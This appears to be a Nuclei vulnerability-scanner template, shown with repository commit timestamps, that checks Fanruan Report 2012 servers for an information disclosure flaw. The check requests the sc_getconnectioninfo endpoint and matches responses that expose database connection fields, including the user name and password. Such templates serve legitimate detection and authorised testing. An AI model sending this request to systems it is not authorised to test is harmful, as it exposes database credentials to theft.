nuclei-templates/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2021-05-20 17:26:55 +00:00
id: fanruanoa2012-disclosure
info:
name: Fanruan Report 2012 Information Disclosure
author: YanYun
severity: high
description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
metadata:
max-request: 2
2023-10-14 11:27:55 +00:00
tags: oa,java,fanruan,disclosure
2021-05-20 17:26:55 +00:00
http:
2021-05-20 17:26:55 +00:00
- method: GET
path:
- "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
- "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
2021-05-20 17:45:01 +00:00
- '"connection"'
- '"name"'
- '"driver"'
- '"password"'
- '"url"'
- '"user"'
condition: and
- type: word
words:
- "application/json"
2023-10-14 11:27:55 +00:00
part: header
# digest: 4b0a00483046022100b900f828bd204277c8567db75729453cfa606cb19b0d483fdf77c550c320ab43022100c7226d84de5f0777b215fe9a2b861232df53f2e4b5cbd730ebfc1680a9d1a820:922c64590222798bb761d5b6d8e72950